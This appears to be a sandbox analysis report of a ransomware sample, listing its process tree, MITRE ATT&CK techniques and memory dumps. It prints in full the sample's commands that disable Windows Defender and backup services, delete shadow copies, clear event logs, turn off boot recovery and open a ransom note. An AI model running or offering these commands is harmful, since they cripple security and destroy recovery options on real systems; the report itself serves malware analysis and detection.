PID 676 wrote to memory of 3308	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	106
PID 676 wrote to memory of 2532	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	108
PID 676 wrote to memory of 2532	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	108
PID 676 wrote to memory of 1448	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	110
PID 676 wrote to memory of 1448	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	110
PID 676 wrote to memory of 1652	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	112
PID 676 wrote to memory of 1652	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	112
PID 676 wrote to memory of 1516	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	114
PID 676 wrote to memory of 1516	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	114
PID 676 wrote to memory of 1012	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	116
PID 676 wrote to memory of 1012	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	116
PID 676 wrote to memory of 2440	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	118
PID 676 wrote to memory of 2440	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	118
PID 676 wrote to memory of 3796	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	120
PID 676 wrote to memory of 3796	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	120
PID 676 wrote to memory of 2984	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	122
PID 676 wrote to memory of 2984	676	69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe	122

C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:676
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:3956
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2356
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:3388
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:1140
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:448
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:3820
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:2728
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:1168
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_12d5a" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_12d5a" /y
    3⤵
    PID:3656
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  PID:3688
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  PID:3684
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  PID:1424
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  PID:860
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  PID:1064
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  PID:3308
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  PID:2532
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  PID:1448
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_12d5a" start= disabled
  2⤵
  PID:1652
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1516
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:1012
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2440
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:3796
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:2984
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:2472
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2704
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:3528
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:704
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:3172
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:456
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:3028
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:2124
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:2288
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2820
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2784
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1208
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:532
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:4028
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:2876
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:2916
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:700
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:3200
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:3624
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:384
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:3552
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:3700
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1496
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1616
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1792
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1968
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:2844
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2132
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2064
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2572
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2168
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3720
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1512
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1204
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:776
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:3820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3360
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:376
- C:\Windows\SYSTEM32\notepad.exe
  notepad.exe C:\MJZ1_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"
  2⤵
  PID:2144
- - C:\Windows\system32\PING.EXE
    ping.exe -n 5 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3936

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/376-221-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-259-0x000001F913426000-0x000001F913428000-memory.dmp

Filesize
8KB

Download
memory/376-230-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-257-0x000001F913420000-0x000001F913422000-memory.dmp

Filesize
8KB

Download
memory/376-231-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-258-0x000001F913423000-0x000001F913425000-memory.dmp

Filesize
8KB

Download
memory/376-262-0x000001F913428000-0x000001F913429000-memory.dmp

Filesize
4KB

Download
memory/376-225-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-233-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-223-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-226-0x000001F92F310000-0x000001F92F332000-memory.dmp

Filesize
136KB

Download
memory/376-232-0x000001F92F4C0000-0x000001F92F536000-memory.dmp

Filesize
472KB

Download
memory/376-228-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-224-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-229-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/376-222-0x000001F913410000-0x000001F913412000-memory.dmp

Filesize
8KB

Download
memory/3360-180-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-185-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-184-0x000002C6707A0000-0x000002C6707C2000-memory.dmp

Filesize
136KB

Download
memory/3360-181-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-186-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-179-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-189-0x000002C66E6C3000-0x000002C66E6C5000-memory.dmp

Filesize
8KB

Download
memory/3360-188-0x000002C66E6C0000-0x000002C66E6C2000-memory.dmp

Filesize
8KB

Download
memory/3360-190-0x000002C670950000-0x000002C6709C6000-memory.dmp

Filesize
472KB

Download
memory/3360-191-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-195-0x000002C66E6C6000-0x000002C66E6C8000-memory.dmp

Filesize
8KB

Download
memory/3360-196-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-197-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-217-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-218-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-219-0x000002C66E6C8000-0x000002C66E6C9000-memory.dmp

Filesize
4KB

Download
memory/3360-182-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-183-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download
memory/3360-187-0x000002C654880000-0x000002C654882000-memory.dmp

Filesize
8KB

Download